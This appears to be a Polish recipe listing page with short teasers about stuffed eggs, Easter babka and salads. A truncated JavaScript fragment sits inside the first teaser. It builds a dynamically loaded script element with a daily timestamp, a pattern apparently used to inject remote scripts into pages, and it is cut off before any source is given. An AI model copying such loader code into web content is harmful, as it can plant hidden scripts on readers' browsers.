
Faszerowane jajka można podawać w wielu wariantach. Zawsze wszystkim smakują i w ekspresowym tempie znikają z talerzy. Sprawdzą się nie tylko na wielkanocnym stole, ale będą również wyśmienitą (a co najważniejsze: łatwą do przygotowania) przekąską dla gości na różnego rodzaju przyjęciach i spotkaniach. Oto moje ulubione przepisy na faszerowane jajka, które zdecydowanie warto zapamiętać. var stamp = parseInt(new Date().getTime()/86400, 10);var script = document.createElement('script');script.setAttribute('type', 'text/javascript');scri... czytaj dalej...

Jajka faszerowane to świetna alternatywa dla zwykłych jajek. Możemy je nadziać pieczarkami, pomidorami, czy też różnego rodzaju rybami.
Czytaj dalej...
Babka wielkanocna - wyobrażacie sobie bez niej święta? Chyba śmiało można rzec, że jest bardziej popularnym wypiekiem wielkanocnym niż mazurek.
Czytaj dalej...
Sałatki stały się nieodłącznym elementem każdego menu. Jemy je na śniadanie, kolację, a czasami te treściwsze zastępują nam nawet obiad.
Czytaj dalej...